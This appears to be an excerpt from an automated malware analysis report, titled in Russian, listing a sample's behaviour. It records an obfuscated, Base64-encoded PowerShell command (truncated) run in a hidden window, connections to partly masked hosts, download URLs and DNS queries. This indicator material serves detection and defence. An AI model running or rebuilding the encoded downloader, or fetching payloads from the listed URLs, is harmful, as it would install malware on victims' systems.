Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAgACgAIAAkAHMASABlAEwAbABpAEQAWwAxAF0AKwAkAFMASABlAEwAbABpAEQAWwAxADMAXQArACcAWAAnACkAIAAoACAATgBlAFcALQBvAGIASgBFAEMAVAAgAFMAeQBzAFQAZQBtAC4AaQBPAC4AQwBvAE0AcABSAGUAUwBTAGkATwBOAC4AZABlAE...
- 'ni####tourguide.net':80
- 'st####icronics.org':80
- 'st####icronics.org':443
- 'sw###japan.com':80
- 'sw###japan.com':443
- 'id###balance.hu':80
- http://ni####tourguide.net/acmailer/nisekocojp/js/SxaHwG/
- http://st####icronics.org/uEqPnL/
- http://sw###japan.com/TShagO8J/
- http://id###balance.hu/HBKNlN/
- 'st####icronics.org':443
- 'sw###japan.com':443
- DNS ASK ni####tourguide.net
- DNS ASK te###ademae.com
- DNS ASK st####icronics.org
- DNS ASK st####cronics.de
- DNS ASK sw###japan.com
- DNS ASK id###balance.hu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAgACgAIAAkAHMASABlAEwAbABpAEQAWwAxAF0AKwAkAFMASABlAEwAbABpAEQAWwAxADMAXQArACcAWAAnACkAIAAoACAATgBlAFcALQBvAGIASgBFAEMAVAAgAFMAeQBzAFQAZQBtAC4AaQBPAC4AQwBvAE0AcABSAGUAUwBTAGkATwBOAC4AZABlAE...' (со скрытым окном)